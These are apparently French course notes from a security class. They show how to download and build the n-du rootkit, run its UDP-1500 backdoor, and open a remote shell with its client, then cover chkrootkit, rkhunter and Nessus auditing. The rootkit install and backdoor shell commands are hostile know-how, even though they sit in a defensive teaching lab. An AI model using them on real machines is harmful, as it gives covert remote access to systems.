User Tools

Site Tools


coursieps:20060505

Table of Contents

rootkit utilise un backdoor (porte dérobée) pour se connecter

n-du: écoute sur le port UDP 1500. Le client spécifie via ce canal quel port TCP ouvrir sur la machine cible.

On va télécharger le rootkit sur le site http://www.packetstormsecurity.nl/: http://www.packetstormsecurity.nl/UNIX/penetration/rootkits/index4.html

wget http://www.packetstormsecurity.nl/UNIX/penetration/rootkits/n-du.tgz
tar xzf n-du.tgz
cd n-du
make

Ensuite, on a 2 exécutables:

  • n-du, le “serveur”
  • n-client, le client distant
netstat -anu
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat       
udp        0      0 0.0.0.0:32768           0.0.0.0:*                          
udp        0      0 0.0.0.0:2049            0.0.0.0:*                          
udp        0      0 192.168.2.138:137       0.0.0.0:*                          
udp        0      0 0.0.0.0:137             0.0.0.0:*                          
udp        0      0 192.168.2.138:138       0.0.0.0:*                          
udp        0      0 0.0.0.0:138             0.0.0.0:*                          
udp        0      0 0.0.0.0:782             0.0.0.0:*                          
udp        0      0 0.0.0.0:785             0.0.0.0:*                          
udp        0      0 0.0.0.0:68              0.0.0.0:*                          
udp        0      0 0.0.0.0:8010            0.0.0.0:*                          
udp        0      0 0.0.0.0:111             0.0.0.0:*                          
udp        0      0 0.0.0.0:631             0.0.0.0:*                          
udp        0      0 0.0.0.0:763             0.0.0.0:* 

Lancer le serveur:

./n-du
netstat -anu
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat       
udp        0      0 0.0.0.0:32768           0.0.0.0:*                          
udp        0      0 0.0.0.0:2049            0.0.0.0:*                          
udp        0      0 192.168.2.138:137       0.0.0.0:*                          
udp        0      0 0.0.0.0:137             0.0.0.0:*                          
udp        0      0 192.168.2.138:138       0.0.0.0:*                          
udp        0      0 0.0.0.0:138             0.0.0.0:*                          
udp        0      0 0.0.0.0:782             0.0.0.0:*                          
udp        0      0 0.0.0.0:785             0.0.0.0:*                          
udp        0      0 0.0.0.0:68              0.0.0.0:*                          
udp        0      0 0.0.0.0:8010            0.0.0.0:*                          
udp        0      0 0.0.0.0:1500            0.0.0.0:*                          
udp        0      0 0.0.0.0:111             0.0.0.0:*                          
udp        0      0 0.0.0.0:631             0.0.0.0:*                          
udp        0      0 0.0.0.0:763             0.0.0.0:*  

Le port 1500 est maintenant ouvert.

Depuis la machine locale, taper:

./n-client ip_machine_cible 1666 1500

où 1666 est le port TCP sur lequel ouvrir la connexion (un shell).

Détection de rootkit

chkrootkit

aptitude install chkrootkit

(répondre non à la question de savoir s'il faut le faire tourner avec un cron) Le lancer en tant que root:

chkrootkit

Attention aux faux positifs: lire le fichier /usr/share/doc/chkrootkit/README.FALSE-POSITIVES. Mais pas très à jour

rkhunter

Installation:

aptitude install rkhunter

Utilisation (check all):

rkhunter -c

On note qu'aucun des 2 n'a détecté n-du alors qu'il tournait…

Nessus

Scanner de vulnérabilité: on peut aussi scanner des machines distantes. Le serveur contient les vulnérabilités connues.

Installation:

apt-get install nessus nessusd

NB: il faut aussi libssl0.9.5 ou plus récent et libgnutls-dev.

Lire d'abord /usr/share/doc/nessus/README.Debian

En root:

nessus-mkcert
nessus-adduser linux
nessusd -D

plug-in = faille connue que l'on peut tester.

En user, le client:

nessus

Pour choisir la cible à auditer, aller sur l'onglet “Target” et taper l'IP de cette machine.

Si on connaît déjà a priori la machine, on peut éliminer une série de plug-ins.

Exercice

On définit une machine comme étant le serveur nessus, on audite les autres avec nessus et on comble les failles détectées.

On va se servir de la passerelle puisqu'on pourra s'y connecter depuis le réseau de l'école (machine de bureau avec un GUI pour utiliser le client nessus).

Pour se connecter, la passerelle a l'IP 192.168.2.21. Pour se connecter en SSH, le port est 220n, où n est le numéro du serveur (de 1 à 5).

coursieps/20060505.txt · Last modified: 2013/01/30 17:50 (external edit)